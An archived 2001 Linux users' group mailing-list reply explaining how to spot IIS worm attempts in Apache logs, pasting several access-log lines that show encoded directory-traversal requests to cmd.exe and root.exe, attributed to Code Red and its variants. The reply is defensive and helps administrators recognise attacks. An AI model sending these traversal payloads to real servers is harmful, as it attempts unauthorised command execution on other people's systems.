RE: [PLUG] what logs to watch?

Adam Van Antwerp on Thu, 13 Dec 2001 23:50:53 +0100

[Date Prev] [Date Next] [Thread Prev] [Thread Next] [Date Index] [Thread Index]

RE: [PLUG] what logs to watch?

From: "Adam Van Antwerp" <avanantwerp@princetelecom.com>

To: <plug@lists.phillylinux.org>

Subject: RE: [PLUG] what logs to watch?

Date: Thu, 13 Dec 2001 17:48:04 -0500

Reply-to: plug@lists.phillylinux.org

Sender: plug-admin@lists.phillylinux.org

24.39.185.119 - - [13/Dec/2001:15:34:13 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 24.39.185.119 - - [13/Dec/2001:15:34:13 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299 24.39.185.119 - - [13/Dec/2001:15:34:14 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 24.39.185.119 - - [13/Dec/2001:15:34:14 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283 24.39.185.119 - - [13/Dec/2001:15:34:14 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 24.39.185.119 - - [13/Dec/2001:15:34:14 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300 24.39.146.8 - - [13/Dec/2001:18:36:54 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278 any of the above are Code Red and variants.... -----Original Message----- From: plug-admin@lists.phillylinux.org [mailto:plug-admin@lists.phillylinux.org]On Behalf Of Guillermo Moyna Sent: Thursday, December 13, 2001 4:52 PM To: plug@lists.phillylinux.org Subject: Re: [PLUG] what logs to watch? >also the Apache Error logs shows you IIS-style worms attempts How do you recognize these ones in the httpd logs? Guillermo +==================-------------- --- -- - - - - Guillermo Moyna, PhD Assistant Professor of Chemistry Department of Chemistry & Biochemistry University of the Sciences in Philadelphia 600 South 43rd Street Philadelphia, PA 19104-4495 "The only existing things are atoms and empty space. All else is mere opinion" - Democritus, 370 B.C. Office: Grifith Hall 360 Phone: (215) 596-8526 Fax: (215) 596-8543 e-mail: g.moyna@usip.edu WWW: http://tonga.usip.edu/gmoyna/index.html http://www.usip.edu/chemistry/faculty/moyna.asp - - - - -- --- -----------=================+ ______________________________________________________________________ Philadelphia Linux Users Group - http://www.phillylinux.org Announcements-http://lists.phillylinux.org/mail/listinfo/plug-announce General Discussion - http://lists.phillylinux.org/mail/listinfo/plug ______________________________________________________________________ Philadelphia Linux Users Group - http://www.phillylinux.org Announcements-http://lists.phillylinux.org/mail/listinfo/plug-announce General Discussion - http://lists.phillylinux.org/mail/listinfo/plug

References:

Re: [PLUG] what logs to watch?
From: Guillermo Moyna <g.moyna@usip.edu>

Prev by Date: Re: [PLUG] what logs to watch?

Next by Date: Re: [PLUG] NFS Question

Previous by thread: Re: [PLUG] what logs to watch?

Next by thread: Re: [PLUG] what logs to watch?

Index(es):

Date

Thread